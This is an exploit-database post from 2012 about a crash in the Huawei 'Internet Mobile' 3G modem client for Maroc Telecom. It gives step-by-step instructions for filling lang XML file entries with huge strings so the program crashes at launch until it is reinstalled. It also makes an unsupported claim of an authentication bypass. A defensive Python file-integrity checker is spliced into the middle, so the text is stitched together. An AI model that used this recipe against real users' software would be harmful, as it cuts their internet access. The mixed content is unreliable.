Maroc Telecom (HUAWEI Technologies) Exception handling

29 Jun 2012, reported by Dark-Puzzle. Type: zdt. Source: 0day.today

Maroc Telecom (HUAWEI Technologies) Exception handling vulnerability. High risk exploit with potential DoS attack

Code
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1               ==========================================               1
 0                   I'm Dark-Puzzle From Inj3ct0r TEAM                   0
 0                                                                        1
 1                       dark-puzzle[at]live[at]fr                        0
 0               ==========================================               1
 1                 Pentesting/exploit coding/bug research                 0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
         [0day Exploits]  Allah , Alwatan , Almalik .[0day Exploits]
HIGH RISK EXPLOIT .

USE THIS EXPLOIT AT YOUR OWN RISK I'M NOT RESPONSIBLE OF ANY HARM .

#Exploit name : Internet Mobile - Maroc Telecom (HUAWEI Technologies) Exception handling vulnerability 
#Author : Dark-Puzzle ([email protected])
#Type : Remote .
#Risk : High
#Vulnerable Version : 11.302.09.05.162 (Other Versions [If Available] May Also Be Vulnerable)
#Software Vendor : HUAWEI Technologies & Maroc Telecom . 
#Software Link : Software is Installed Via The 3G connection modem.
#Date : 28 June 2012 .

--------------------------------------------------------------------------------------------------------
Exploit :
The program was allowed to process the exception.
The exception is an access violation on the write through EAX, caused by flooding CX (the low word of the ECX register).

[Imp Registers] :

EAX 00190000 ASCII "Actx"
ECX 00000041


[Exception Handling In Main Thread] 
Disassembly :
          
TEST ECX,ECX
JE SHORT COMCTL32.720AB00B         
MOVZX ECX,WORD PTR DS:[EDX+EAX]
TEST CX,CX
JE SHORT COMCTL32.720AB00B
MOV WORD PTR DS:[EAX],CX <<----- Access Violation = Exception Handling Vulnerability .
INC EAX
INC EAX
DEC ESI
JNZ SHORT COMCTL32.720AAFF3 

---------------------------------------------------------------------------------------------------------
Risks :  HIGH

The program crashes when it is executed (double-click, the interface shows up, the charging button comes up, then boom, crash).

This exploit in the HUAWEI modem is considered high risk because the attacker can edit the XML and lang files that refer directly to DLLs,
which in most cases means editing sensitive lines. So the attacker can gain the privileges to bypass the program's authentication, or use the exception handling to DoS the user's program until it is reinstalled (not restarted). A normal user cannot know that the source of the crash is the XML files; nobody searches or reads these files most of the time.
The user will then stay without an Internet connection for a considerable period of time, until reinstalling the program or contacting the vendor.
 
----------------------------------------------------------------------------------------------------------
How To Exploit : (USE IT AT YOUR OWN RISK , I am not responsible for what is done with this vulnerability) I'm not responsible for any harm .

Go to ----> C:\Program Files\Internet Mobile\plugins\SMSUIPlugin (for example)
Now open the lang files ---> French and English : SMSUIPlugin_fr-fr and SMSUIPlugin_en-us
Replace the lines :
<item name="IDS_PLUGIN_NAME">Texte</item> and

<item name="IDS_PLUGIN_MENUITEM">Message &Texte</item> and this one

<item name="IDS_TREE_DINBOX">Boite de réception</item> (the English file has the same names, with the values in English instead of French)

-------------------------------------------

Replace them with that (for example) :

This : <item name="IDS_PLUGIN_NAME">Texte</item>

Will become This : <item name="IDS_PLUGIN_NAME"> Very Very Very Huge Number Of AAA or whatever </item>

Do the same for the other lines shown before. This will make the program crash when it is opened.

The victim will not be able to run the software again until it is reinstalled.

A script will soon be available to replace the lang files automatically. ( PoC )

-----------------------------------------------------------------------------------------------------
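
On the defensive side, the lang-file tampering described above can be caught before the client is launched. The following Python check is an added example, not code from the original advisory or from the vendor: it compares each lang file with a SHA-256 recorded from a clean install and flags <item> values longer than a threshold. The 256-character limit, the <lang> root element in the sample data and the function names are assumptions.

```python
import hashlib
import xml.etree.ElementTree as ET
from pathlib import Path

MAX_ITEM_CHARS = 256  # assumed ceiling for a UI label, not a vendor-documented limit


def oversized_items(xml_bytes, max_chars=MAX_ITEM_CHARS):
    """Return [(item name, value length)] for <item> values longer than max_chars."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        # A lang file that no longer parses is itself worth flagging.
        return [("<parse-error>", str(exc))]
    hits = []
    for item in root.iter("item"):  # works whatever the root element is called
        value = "".join(item.itertext())
        if len(value) > max_chars:
            hits.append((item.get("name", "<unnamed>"), len(value)))
    return hits


def audit_lang_files(paths, baseline):
    """Check lang files against known-good hashes and scan them for oversized items.

    baseline maps file name -> SHA-256 hex digest recorded from a clean install.
    Returns {file name: {"modified": bool, "oversized": [...]}} for suspicious files only.
    """
    report = {}
    for path in map(Path, paths):
        data = path.read_bytes()
        modified = hashlib.sha256(data).hexdigest() != baseline.get(path.name)
        hits = oversized_items(data)
        if modified or hits:
            report[path.name] = {"modified": modified, "oversized": hits}
    return report


# Constructed sample data (the <lang> root element is an assumption).
CLEAN = '<lang><item name="IDS_PLUGIN_NAME">Texte</item></lang>'.encode()
TAMPERED = ('<lang><item name="IDS_PLUGIN_NAME">' + "A" * 5000 + "</item></lang>").encode()

if __name__ == "__main__":
    print(oversized_items(CLEAN))
    print(oversized_items(TAMPERED))
```

Restricting write access on the plugin directory to administrators removes the precondition entirely; the check above is for hosts where that cannot be guaranteed.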

Dark-Puzzle (Souhail) .
\x90
Follow me : fb.me/dark.puzzle
\x90
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army
\x90
Greetz to : M.C.A , Team-Hunter , [email protected] , All Inj3ct0r team Members , Packetstromsecurity.org , Ar-Devlopers....
\x90
Pentesting is my LIFE .
\x90
GREY HAT Mercy From M0rocC0 .



#  0day.today [2018-04-10]  #
